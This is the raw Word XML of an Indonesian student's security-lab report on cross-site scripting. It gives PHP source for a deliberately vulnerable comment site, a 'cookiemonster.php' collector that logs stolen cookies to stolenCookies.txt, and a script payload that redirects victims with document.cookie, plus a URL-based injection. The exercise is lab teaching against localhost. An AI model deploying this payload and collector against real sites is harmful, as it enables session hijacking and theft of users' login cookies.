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DE3AC" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A8355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94394">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">LAPORAN PRAKTIKUM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3F60F" w14:textId="16DBB373" w:rsidR="00A83551" w:rsidRPr="00A83551" w:rsidRDefault="00A83551" w:rsidP="00A8355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KEAMANAN SISTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F3563F" w14:textId="61B201DF" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A8355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94394">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PERTEMUAN KE-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5F407C96" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A83551">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47F86E31" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A83551">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A836A1" w14:textId="32459450" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A83551">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C94394">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:lang w:eastAsia="id-ID"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6773E931" wp14:editId="64C5DB49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7662" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A835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E7AC7" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A835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38CA6E" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A835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AU" w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C94394">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-AU" w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Disusun oleh :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BAC942" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A83551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NAMA</w:t>
      </w:r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 xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C94394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FERDI DIRGANTARA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C7C703" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A83551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NIM    </w:t>
      </w:r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175410039</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A965A" w14:textId="0D6AC759" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A83551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JURUSAN </w:t>
      </w:r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 xml:space="preserve">: </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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INFORMATIKA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6F9DA" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A83551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JENJANG</w:t>
      </w:r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S1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3BDD1D" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A8355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9E6EDC" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A8355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0A3782" w14:textId="77777777" w:rsidR="00A83551" w:rsidRPr="00C94394" w:rsidRDefault="00A83551" w:rsidP="00A83551">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C94394">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SEKOLAH TINGGI MANAJEMEN INFORMATIKA DAN KOMPUTERAKAKOMYOGYAKARTA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B843CE" w14:textId="4AB7DC04" w:rsidR="00F6437B" w:rsidRDefault="00A83551" w:rsidP="00A835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94394">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A805661" w14:textId="787E814E" w:rsidR="00A83551" w:rsidRDefault="00A83551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83384C6" w14:textId="66FA1354" w:rsidR="00A83551" w:rsidRDefault="00A83551" w:rsidP="00A835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M</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83551">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">alicious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A83551">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ttack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05675E52" w14:textId="2002F677" w:rsidR="00F57882" w:rsidRDefault="00F57882" w:rsidP="00F578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7882">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Membuat Database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Pr="00F57882">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tabel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB5FF0F" w14:textId="7A1D9DBD" w:rsidR="00F57882" w:rsidRDefault="00F57882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7D0990" wp14:editId="7FE4B911">
            <wp:extent cx="22669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E1AB" w14:textId="4B88B86C" w:rsidR="007C2456" w:rsidRPr="00F57882" w:rsidRDefault="007C2456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dan tabel tersebut akan digunakan untuk menyimpan data komentar yang nanti akan dijadikan contoh Malicious Attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7043A" w14:textId="049CC6A1" w:rsidR="00F57882" w:rsidRDefault="00F57882" w:rsidP="00F578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Mengambil Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1152AC" w14:textId="5A901A3B" w:rsidR="005205AE" w:rsidRDefault="007C2456" w:rsidP="005205A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demonstrasi ini digunakan dua buah file php untuk menambahkan data yaitu index.php dan untuk mengirimkan autKey cookie yaitu file cookiemonster.php</w:t>
      </w:r>
      <w:r w:rsidR="005205AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, berikut adalah kedua file tersebut.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B4091" w14:textId="4DD775DF" w:rsidR="005205AE" w:rsidRDefault="005205AE" w:rsidP="005205A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Index.php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205AE" w14:paraId="1881D04B" w14:textId="77777777" w:rsidTr="005205AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D66EC5C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&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50867789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51A4B51C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(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isset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$_POST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'newCookie'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]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36C4D40E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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3807F19B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$cookie_name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=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"authKey"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23CC9CF4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$cookie_value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= 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md5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microtime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  <w:p w14:paraId="7BAE07B7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setcookie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$cookie_name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$cookie_value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 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time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 + (</w:t>
            </w:r>
            <w:r w:rsidRPr="005205A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86400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* </w:t>
            </w:r>
            <w:r w:rsidRPr="005205A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30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),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"/"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 </w:t>
            </w:r>
            <w:r w:rsidRPr="005205AE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// 86400 = 1 day</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E6AF7D5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echo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"&lt;h2 align='center'&gt; authKey Cookie SET! &lt;/h2&gt;"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48B28610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</w:p>
          <w:p w14:paraId="03CDEBEF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0DE0D451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(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isset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$_POST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'outputCookie'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]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="053DEC83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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A72333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isset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$_COOKIE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'authKey'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]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DFE2B8D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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD999C4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    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echo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"&lt;h2 align='center'&gt; authKey Cookie: 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$_COOKIE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'authKey'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].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"&lt;/h2&gt;"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58ECAA00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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A42ABE1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else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC87D1A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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38742849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    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echo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"&lt;h2 align='center'&gt; authKey Cookie: NOT SET &lt;/h2&gt;"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5B3A4A31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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="663D1330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</w:p>
          <w:p w14:paraId="50160D06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78FE914B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$servername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=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"localhost"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5918DC96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$username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=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"root"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29D34787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$password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=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296BC223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$dbname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=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"xss3"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2603861E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703CF8B9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// Create connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E1ECA83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$conn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= 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new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mysqli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$servername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$username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$password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$dbname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2E4C06CA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// Check connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AD4F52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lastRenderedPageBreak/>
              <w:t>if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$conn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-&gt;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connect_error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 {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C8D1C2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die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"Connection failed: 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.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$conn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-&gt;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connect_error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3723D891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</w:p>
          <w:p w14:paraId="75380B63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0219D792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(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isset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$_POST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'clear'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]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346FA03B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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3962C703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$sql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=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"TRUNCATE TABLE comments"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1D7984D3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$conn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-&gt;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query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$sql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 === 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TRUE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 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59E9581C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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67E6129F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    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echo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"Table Cleared"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00653F8C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} </w:t>
            </w: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else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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="474392E9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    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echo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"Error: Unable to Clear Table"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$conn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-&gt;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error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0667BF34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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="551EE57D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</w:p>
          <w:p w14:paraId="1D56BDB6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23B8A5AB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(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isset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$_POST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'comment'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]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB84D96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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="228563BD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$sql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=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INSERT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INTO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 comments (comment)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72500108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VALUES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 ('".addslashes(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$_POST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['comment'])."')"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024472AA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</w:p>
          <w:p w14:paraId="16EFA6D2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02DF8F93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?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5593B73E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&lt;!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DOCTYPE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html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1EE9B240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html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0667FAE0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title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XSS Tutorial #4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title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5E100AA3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style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2874EFF3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#bord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/>
              </w:rPr>
              <w:t>td</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="292603DD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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="326EECCF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   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border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 </w:t>
            </w:r>
            <w:r w:rsidRPr="005205A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1px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solid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black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647F8B87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   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border-collapse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collapse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0C189B14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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27020A5C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style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145438D3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body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7E14C27A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h1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F44747"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>align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"center"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Try My New Comment &amp; Cookie Website!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h1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7D75BBA0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table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F44747"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>align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"center"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28ABEC54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tr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td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66960816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24C12F53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&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22415C3F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(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isset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$_GET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'name'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]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="407C8F3D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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="058FF367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echo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"&lt;p align='center'&gt;Hey there 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$_GET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'name'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].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"! Welcome!&lt;/p&gt;"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7E795A88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</w:p>
          <w:p w14:paraId="10930261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(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isset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$_POST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'comment'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]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72CEF729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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08ECDB61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$conn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-&gt;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query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$sql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 === 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TRUE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 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01A8D8E8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lastRenderedPageBreak/>
              <w:t>    {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4595E664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    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echo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"New record created successfully"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22B46751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} </w:t>
            </w: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else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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DEC5D52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    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echo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"Error: Unable to add comment"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6FC51D41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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78003A39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</w:p>
          <w:p w14:paraId="3BC6A766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?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F10D649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p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53F98D61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form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action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"index.php"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method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"post"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id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"post"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27B19A6E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textarea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rows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"6"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cols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"50"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name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"comment"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placeholder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"Leave a comment"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maxlength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"400"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textarea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637E3FC8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table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F44747"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>align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"center"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tr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td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7D61C2FB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input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type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"submit"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value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"Comment"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/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A820388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td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tr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table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58CE450F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form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7C3C2351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form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action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"index.php"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method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"post"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2A23D695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table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F44747"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>align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"center"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tr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td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3BEBEB38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input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type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"submit"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name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"newCookie"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value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"New Cookie"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/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64AB9C0F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input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type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"submit"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name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"outputCookie"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value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"Output Cookie"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/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="268EC7B0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td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tr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table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4E8F756A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form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70985279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form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action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"index.php"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method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"get"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1EA0EC89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table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F44747"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>align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"center"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tr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td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1E9F11EC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Name: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input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type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"text"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name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"name"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/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="577F4F84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input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type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"submit"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value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"Submit"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/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A1A716A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td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tr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table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737DD003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form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3CA2017F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td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tr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2E202919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table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22D57442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br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/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D9C916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br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/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B044B46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table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F44747"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>align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"center"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id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"bord"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7EC8A70D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&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72BD89C4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$sql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=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SELECT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 id, comment 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FROM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 comments"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6C5B21B5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$result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=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$conn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-&gt;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query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$sql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7F29002E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62F8E669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$result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-&gt;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num_rows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&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="005205A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 {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01AC342C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/>
              </w:rPr>
              <w:t>// output data of each row</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="465A3049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while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$row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=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$result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-&gt;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fetch_assoc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 {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFB321F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    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echo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"&lt;tr&gt;&lt;td style='width:35%;padding:10px'&gt;Comment #"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$row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"id"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].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"&lt;br /&gt;&lt;hr /&gt;"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$row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"comment"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].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"&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;"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1BBE9253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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7900436E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 </w:t>
            </w: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else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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A27C587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echo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"&lt;tr&gt;&lt;td style='width:35%'&gt;No Comments!&lt;/td&gt;&lt;/tr&gt;"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02D19B8C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</w:p>
          <w:p w14:paraId="3E48F29F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lastRenderedPageBreak/>
              <w:t>$conn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-&gt;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close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();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F90906A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?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3800E409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table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15390996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h3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F44747"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>align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"center"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This website was made by me! I hope you really really like it!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h3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48316A93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table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F44747"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>align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"center"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2AD27440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tr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td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66C295D6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form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action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"index.php"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method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"post"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51FB23BC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Debug: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input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type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"submit"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name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"clear"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value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"Clear Table"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/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A96B9D7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form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73643F13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td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tr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67D4B12A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table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659D7C6F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body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30D5E368" w14:textId="3873A6EA" w:rsidR="005205AE" w:rsidRPr="00E81F76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html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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DD1D596" w14:textId="6B4BAC69" w:rsidR="005205AE" w:rsidRDefault="005205AE" w:rsidP="005205A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223A12" w14:textId="16050ACD" w:rsidR="005205AE" w:rsidRDefault="005205AE" w:rsidP="005205A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Cookiemonster.php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205AE" w14:paraId="2EEB81CE" w14:textId="77777777" w:rsidTr="005205AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0094AF62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&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6318F0FB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4EE1B7BB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(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isset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$_GET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'cookie'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]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4452717A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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29D8286B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$file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= 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'stolenCookies.txt'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64935534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   </w:t>
            </w:r>
            <w:r w:rsidRPr="005205AE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file_put_contents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$file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$_GET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[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'cookie'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].PHP_EOL, FILE_APPEND);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03389EE9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</w:p>
          <w:p w14:paraId="41E096F7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?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="600C4B62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&lt;!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DOCTYPE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html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52B4DDA5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html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7FA7E41F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title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XSS Tutorial #4 - Problem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title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66E769A7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body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56CD1730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h1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  <w:r w:rsidRPr="005205AE">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="F44747"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>align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5205A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"center"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Oh No! Something went wrong! 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h1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14FF7F61" w14:textId="77777777" w:rsidR="005205AE" w:rsidRPr="005205AE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body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</w:p>
          <w:p w14:paraId="4E76641D" w14:textId="60FBD6FE" w:rsidR="005205AE" w:rsidRPr="00E81F76" w:rsidRDefault="005205AE" w:rsidP="005205A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&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="005205AE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html</w:t>
            </w:r>
            <w:r w:rsidRPr="005205AE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en-US"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="005205A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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A7C154A" w14:textId="56143A8B" w:rsidR="005205AE" w:rsidRDefault="005205AE" w:rsidP="005205A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758767" w14:textId="77777777" w:rsidR="00E81F76" w:rsidRDefault="00E81F76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93FC685" w14:textId="1E54F8F4" w:rsidR="00E81F76" w:rsidRDefault="00E81F76" w:rsidP="007C245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Berikut adalah tampilan dari index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4FE2F9" w14:textId="63D83A41" w:rsidR="007C2456" w:rsidRPr="007C2456" w:rsidRDefault="007C2456" w:rsidP="007C245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887EDA" wp14:editId="63225209">
            <wp:extent cx="4238625" cy="22936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341" cy="22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4F69" w14:textId="1B8FFD08" w:rsidR="007C2456" w:rsidRDefault="00E81F76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mencuri cookie yang tersimpan kita dapat menggunakan script dibawah yang mengarahkan user menuju halaman cookiemonster.php yang disiapkan kemudian menyalin cookie tersebut ke file stolenCookies.txt. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0861F0B3" w14:textId="77777777" w:rsidR="007C2456" w:rsidRDefault="007C2456" w:rsidP="007C2456">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="12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EBAEFA" w14:textId="2BEEEF60" w:rsidR="007C2456" w:rsidRPr="007C2456" w:rsidRDefault="007C2456" w:rsidP="007C2456">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="12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C2456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ferdi!&lt;script&gt;window.location='http://localhost/xss/cookiemonster.php?cookie='+escape(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56205979" w14:textId="5FC53486" w:rsidR="007C2456" w:rsidRDefault="007C2456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2A7878" wp14:editId="63D46DE7">
            <wp:extent cx="4069092" cy="320484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568" cy="321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D09A" w14:textId="28E83BF2" w:rsidR="007C2456" w:rsidRDefault="007C2456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menekan tombol comment kita akan mendapatkan authKey dari cookie yang disimpan dan kemudian cookie tersebut akan disimpan pada file stolenCookies.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771CD007" w14:textId="06127904" w:rsidR="007C2456" w:rsidRDefault="007C2456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75CA1D" wp14:editId="1B0AB26D">
            <wp:extent cx="4525584" cy="1143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393" cy="11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8B30" w14:textId="2A988450" w:rsidR="007C2456" w:rsidRDefault="00E81F76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818AAC2" wp14:editId="255BA913">
            <wp:extent cx="4972050" cy="9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9130" w14:textId="589C9EBB" w:rsidR="007C2456" w:rsidRDefault="007C2456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824B19" w14:textId="31CC56EE" w:rsidR="007C2456" w:rsidRDefault="007C2456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tombol Output Cookie di klik maka akan tampil authKey dari cookie tersebut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072FA59B" w14:textId="776AF613" w:rsidR="007C2456" w:rsidRDefault="007C2456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525265" wp14:editId="6CD2DAE7">
            <wp:extent cx="4581525" cy="21209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900" cy="21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BD75" w14:textId="65F8482D" w:rsidR="007C2456" w:rsidRDefault="00E81F76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script tersebut dijalankan dan berhasil mendapatkan cookie tersebut program akan secara otomatis mengarahkan user menuju halaman </w:t>
      </w:r>
      <w:r w:rsidR="00C70FD5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookiemonster.php terus menerus saat mencoba membuka file index.php</w:t>
      </w:r>
      <w:r w:rsidR="003D09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F5DE16" w14:textId="7355AF81" w:rsidR="00F22FCE" w:rsidRDefault="00F22FCE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3AECF0" w14:textId="3109B2F1" w:rsidR="00F22FCE" w:rsidRDefault="00F22FCE" w:rsidP="00F22FC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Menambahkan data dengan menggunakan javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22A4FC" w14:textId="5AB6D7AF" w:rsidR="00F22FCE" w:rsidRDefault="00F22FCE" w:rsidP="00F22FC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Selain melakukan redirecting kita juga dapat menambahkan data kedalam sistem dengan menerapkan XSS </w:t>
      </w:r>
      <w:r w:rsidR="00CA7ABD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Cross-Site Scripting) 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Malicious Attack </w:t>
      </w:r>
      <w:r w:rsidR="00CA7ABD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dengan menuliskan suatu script ke URL bar browser, contoh script yang akan dijalankan adalah sebagai berikut.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D371B" w14:textId="56583310" w:rsidR="00CA7ABD" w:rsidRDefault="00CA7ABD" w:rsidP="00F22FC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5E6DBC" w14:textId="77777777" w:rsidR="00CA7ABD" w:rsidRPr="00CA7ABD" w:rsidRDefault="00CA7ABD" w:rsidP="00CA7ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="135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7ABD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://localhost/xss/index.php?name=Ferdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA489A2" w14:textId="1874630F" w:rsidR="00CA7ABD" w:rsidRPr="00CA7ABD" w:rsidRDefault="00CA7ABD" w:rsidP="00CA7ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="135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7ABD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;window.onload=function(){document.getElementsByName('comment')[0].innerHTML=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Belajar XSS Yuk!</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7ABD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10ABBE1D" w14:textId="6F40D880" w:rsidR="00CA7ABD" w:rsidRPr="00CA7ABD" w:rsidRDefault="00CA7ABD" w:rsidP="00CA7ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="135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7ABD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
